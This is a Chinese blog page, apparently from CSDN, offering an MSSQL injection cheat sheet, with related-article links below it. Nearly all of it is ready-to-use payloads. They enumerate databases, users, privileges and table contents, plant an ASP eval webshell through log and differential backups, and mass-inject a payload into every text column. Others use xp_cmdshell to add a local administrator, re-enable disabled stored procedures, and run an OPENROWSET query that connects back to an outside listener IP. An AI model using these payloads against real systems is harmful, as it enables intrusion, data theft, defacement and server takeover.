mssql注入和mysql注入_MSSQL注入代码

最新推荐文章于 2024-06-04 17:59:49 发布
最新推荐文章于 2024-06-04 17:59:49 发布
阅读量128 收藏
点赞数
文章标签: SQL注入 数据库安全 信息获取 权限探测 数据篡改
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39585974/article/details/113904063
版权

■获取数据库名

and db_name()=0

and db_name(0)=0

and db_name(__i__)=0

and quotename(db_name(__i__))=0

■获取用户名

and user=0

■获取版本信息

and @@version=0

■获取服务器名

and @@servername=0

■获取服务名

and @@servicename=0

■获取系统用户名

and system_user=0

■一次性获取所有基本信息

AnD

(dB_NaMe(0)+cHaR(124)+uSeR+cHaR(124)+@@vErSiOn+cHaR(124)+@@sErVeRnAmE+cHaR(124)+@@sErViCeNaMe+cHaR(124)+sYsTeM_UsEr)=0

■一次性探测权限

AnD

(cAsT(iS_srvrOlEmEmBeR(0x730079007300610064006d0069006e00)aS

vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x64006200630072006500610074006f007200)aS

vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x620075006c006b00610064006d0069006e00)aS

vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x6400690073006b00610064006d0069006e00)aS

vArChAr)+cHaR(94)+cAsT(iS_srvrOlEmEmBeR(0x730065007200760065007200610064006d0069006e00)aS

vArChAr)+cHaR(94)+cAsT(iS_mEmBeR (0x7000750062006c0069006300) aS

vArChAr)+cHaR(94)+cAsT(iS_mEmBeR

(0x640062005f006f0077006e0065007200) aS

vArChAr)+cHaR(94)+cAsT(iS_mEmBeR

(0x640062005f006200610063006b00750070006f00700065007200610074006f007200)

aS vArChAr)+cHaR(94)+cAsT(iS_mEmBeR

(0x640062005f006400610074006100770072006900740065007200) aS

vArChAr))=0

■获取数据库的数目

AnD (sElEcT cAsT(cOuNt(1) aS

nvArChAr(100))+cHaR(9) FrOm mAsTeR..sYsDaTaBaSeS)=0

■获取数据库文件名

and (select top 1 filename from (select top

__i__ filename from master..sysdatabases order by filename) t order

by filename desc)=0

■同时获取数据库名和数据库文件名

AnD (sElEcT ToP 1 rtrim(iSnUlL(cAsT(nAmE aS

nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(filenAmE aS

nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__

nAmE,filenAmE FrOm mAsTeR..sYsDaTaBaSeS oRdEr bY nAmE) t oRdEr bY

nAmE dEsC)=0

■获取数据库的表的数目

and (select cast(count(1) as

varchar)+char(9) from

..sysobjects where

xtype=0x75)=0

■获取数据库的表

and (select top 1 name from (select top

__i__ name from ..sysobjects

where xtype=0X75 order by name) t order by name desc)=0

and (select top 1 quotename(name) from

.dbo.sysobjects where

xtype=char(85) AND name not in (select top __i__ name from

.dbo.sysobjects where

xtype=char(85)))=0

■获取表的字段的数目

and (select cast(count(1) as

varchar)+char(9) from

..syscolumns where

id=object_id(''))=0

■获取数据库表的字段

and (select top 1 name from (select top

__i__ name,id from ..syscolumns

where id=object_id('') order by

name) t order by name desc)=0

and (select

col_name(object_id(''),__i__))=0

■获取满足条件的表的记录数

AnD (sElEcT cAsT(cOuNt(1) aS

nvArChAr(100))+cHaR(9) FrOm

..)=0

■获取数据库的内容

AnD (sElEcT ToP 1

rtrim(iSnUlL(cAsT( aS

nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(

aS

nvArChAr(4000)),cHaR(32)))+cHaR(9)+rtrim(iSnUlL(cAsT(

aS nvArChAr(4000)),cHaR(32)))+cHaR(9) FrOm (sElEcT ToP __i__

,,

FrOm

..

oRdEr bY ) t oRdEr bY

dEsC)=0

■基于日志差异备份

--1. 进行初始备份

; Alter Database TestDB Set Recovery Full Drop Table ttt

Create Table ttt (a image) Backup Log TestDB to disk =

'' With

Init--

--2. 插入数据

;Insert Into ttt

Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

--3. 备份并获得文件,删除临时表

;Backup Log To Disk =

'';Drop

Table ttt Alter Database TestDB Set Recovery SIMPLE--

■基于数据库差异备份

1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file

VarChar(400);Set

@file=;Drop

Table ttt Create Table ttt(c Image) Backup Database @a To

Disk=@file--

2. 将数据写入到数据库

;Insert Into ttt

Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

3. 备份数据库并作最后的清理工作

;Declare @b SysName;Set @b=db_name();Declare @file1

VarChar(400);Set

@file1=;Backup

Database @b To Disk=@file1 With Differential,Format;Drop Table

ttt;--

■数据库插马(插指定数据库的指定表的满足条件的记录)

;update

..

set

=+''

where --

■数据库批量插马(插所有可插入的字段和记录,危险!!请谨慎操作!!)

;dEcLaRe @t vArChAr(255),@c vArChAr(255) dEcLaRe tAbLe_cursoR

cUrSoR FoR sElEcT a.nAmE,b.nAmE FrOm sYsObJeCtS a,sYsCoLuMnS b

wHeRe a.iD=b.iD AnD a.xTyPe='u' AnD (b.xTyPe=99 oR b.xTyPe=35 oR

b.xTyPe=231 oR b.xTyPe=167) oPeN tAbLe_cursoR fEtCh next FrOm

tAbLe_cursoR iNtO @t,@c while(@@fEtCh_status=0) bEgIn exec('UpDaTe

['+@t+'] sEt

['+@c+']=rtrim(convert(varchar,['+@c+']))+cAsT(

aS vArChAr(200))') fEtCh

next FrOm tAbLe_cursoR iNtO @t,@c eNd cLoSe tAbLe_cursoR dEAlLoCaTe

tAbLe_cursoR;--

;DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor

CURSOR FOR SELECT a.name,b.name FROM sysobjects a,s yscolumns b

WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR

b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM

Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE

['+@T+'] SET

['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''''')

FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor

DEALLOCATE Table_Cursor--

■执行命令行(无结果返回)

;exec master..xp_cmdshell 'net user name password /add

& net localgroup administrators name /add'--

■恢复存储过程 xp_cmdshell

;Exec Master..sp_dropextendedproc

0x780070005F0063006D0064007300680065006C006C00;Exec

Master..sp_addextendedproc

0x780070005F0063006D0064007300680065006C006C00,0x78706C6F6737302E646C6C--

■SQLServer 2005 开启和关闭 xp_cmdshell

;EXEC master..sp_configure 'show advanced

options',1;RECONFIGURE;EXEC master..sp_configure

'xp_cmdshell',1;RECONFIGURE;

关闭 xp_cmdshell

;EXEC master..sp_configure 'show advanced

options',1;RECONFIGURE;EXEC master..sp_configure

'xp_cmdshell',0;RECONFIGURE;

■SQLServer 2005 开启和关闭 OpenDataSource/OpenRowSet

开启:

;EXEC master..sp_configure 'show advanced

options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc

Distributed Queries',1;RECONFIGURE;

关闭:

;EXEC master..sp_configure 'show advanced

options',1;RECONFIGURE;EXEC master..sp_configure 'Ad Hoc

Distributed Queries',0;RECONFIGURE;

■SQLServer 2005 日志差异备份

alter database [testdb] set recovery full

declare @d nvarchar(4000) set @d=0x640062006200610063006B00

backup database __dbname__ to disk=@d with init--

drop table [itpro]--

create table [itpro]([a] image)--

declare @d nvarchar(4000) set @d=0x640062006200610063006B00

backup log __dbname__ to disk=@d with init--

insert into [itpro]([a]) values(__varchar(木马内容))--

declare @d nvarchar(4000) set @d=__nvarchar(文件名) backup log

__dbname__ to disk=@d with init--

drop table [itpro] declare @d nvarchar(4000) set

@d=0x640062006200610063006B00 backup log __dbname__ to disk=@d with

init--

■查看数据库服务器IP

NC监听80端口:nc -vvlp 80

(反连看IP,自己机器并不一定要有装MSSQL的),在注射点上注射如下语句:

;insert into

OPENROWSET('SQLOLEDB','uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=58.53.58.32,80;',

'select * from dest_table') select * from src_table;--

因为我们只要看IP,所以其他的参数就无所谓了。而端口设置成80,是为了预防一些机器只让访问外部80。

weixin_39585974
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入源码(mssql,mysql)
03-15
支持mssql,mysql,列数据库,文件目录,注册表等
常用的一些 SQL 注入命令
weixin_30348519的博客
07-11 118
//看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('master')) And char...
SQL Server数据库xp_cmdshell提权笔记
最新发布
千寻的博客
06-04 742
SQL Server数据库xp_cmdshell提权
收集PHP+MySQL手工注入语句大全
weixin_34061042的博客
08-29 257
暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union select 1,2,3,4,5…..n/* 利用内置函数暴数据库信息 version() database() user() 不用猜解可用字段暴数据库信息(有些网站不适用)...
一次MSSQL Insert注入刺探.doc
07-18
一次MSSQL Insert注入刺探
oracle盲注技巧,sql盲注的深入讲解
weixin_34005394的博客
04-15 500
SQL注入大家都知道,很多新人都是从这里入门的,虽然注入语句倒背如流,可是其原理估计很少有人了解。稍微了解一下的也仅仅只是知道SQL注入语句只是一种为了使我们获取信息的一种畸形语句。Ps(很多人不知道SQl注入与SQL盲注的区别,现在我告诉你,没有区别。)首先我先讲讲微软对SQL注入的定义。(1)脚本注入式的攻击(2)恶意用户输入用来影响被执行的 SQL 脚本相信大家都看的懂。另外,我看到...
SQL Injection with MySQL 注入分析
09-14
误区在于,许多人误以为在PHP+MySQL下必须使用单引号进行SQL注入,或者无法像在MSSQL中那样通过声明变量和执行系统命令来绕过引号。实际上,只要能构造出不受引号限制的SQL语句,就有可能实现注入。例如,可以通过`...
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
MySQL注入中,由于其语法特性与MSSQL不同,我们无法像在MSSQL中那样直接执行脚本并插入数据。MSSQL允许在查询语句中直接执行存储过程或者系统命令,而MySQL通常限制在执行SQL查询的范围内。然而,这并不意味着在...
mssql注入躲避IDS的方法
09-14
在IT安全领域,SQL注入是一种常见的攻击手段,攻击者通过输入恶意的SQL代码来获取、修改、删除数据库中的敏感信息。本文将详细探讨如何在面对入侵检测系统(IDS)时,利用Microsoft SQL Server (MSSQL)的特定功能进行...
Havij1.14 SQL注入工具 asp php jsp mssql mysql
04-09
标题 "Havij1.14 SQL注入工具 asp php jsp mssql mysql" 提到的是一个名为Havij 1.14的工具,它主要用于检测和利用SQL注入漏洞。SQL注入是一种常见的网络安全问题,攻击者通过在输入字段中插入恶意SQL代码,以获取、...
Windows提权之Mssql(sql server)数据库提权(xp_cmdshell提权)
mrx56的博客
05-18 1173
利用大马或者webshell管理工具登录mssql数据库,执行以下sql命令检查xp_cmdshell是否存在。也可以利用SQL注入。如果xplog70.dll也删除了可以自己上传一个或者执行以下命令恢复。结果为1,则证明存在。当结果为0时,可以通过下列命令恢复。使用xp_cmdshel执行命令。
MSSQL转MySQL最好用的转换工具(数据库搬家喽)
08-24
MSSQL转MySQL最好用的转换工具(数据库搬家喽),winform窗体方便操作哦。
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行提权,利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql没有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
oracle中*_name你知道多少?
clt3617的博客
12-02 297
db_name,instance_name,service_names,db_domain,global_name,global_names,等各有各的用处!不容易理解!也可以参与讨论!http://www.itpub.net/...
MSSQL利用xp_cmdshell 写Debug Log程序
sen_shan的专栏
12-12 700
在写存储过程时,调试程序经常用PRINT或Table记录log,Table在事务提交在相对复杂,PRINT在查询分析器中有效,后端程序调用无法看到效果,针对此问题想到利用xp_cmdshell写Debug Log
操作系统权限提升(二十九)之数据库提权-SQL Server xp_cmdshell 提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
09-23 462
xp_cmdshell可以执行系统命令,该组件默认是关闭的,因此需要把它打开。xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。
SQL Server提权之xp_cmdshell
不曾扬帆,何以至远方
07-17 4321
sql server提权之xp_cmdshell
mssql数据库提权中xp_cmdshell使用
Sindy666的博客
08-20 1827
mssql数据库提权中xp_cmdshell使用 获得sa密码后蚁剑连接数据库,可用xp_cmdshell执行系统命令 xp, extend procedure, 表示本存储过程是扩展的存储过程 cmdshell, command shell, 直接敲命令行执行 判断是否存在xp_cmdshell select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回1证明存在xp_cmdshell xp_c
mssql注入mysql注入的区别
05-31
MSSQL注入MySQL注入都是利用Web应用程序的漏洞来实现未经授权的访问数据库的攻击方式,它们之间的区别在于: 1.语法不同:MSSQL和MySQL在语法上有很大的不同,因此在进行注入时需要使用不同的SQL语句。 2.数据...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值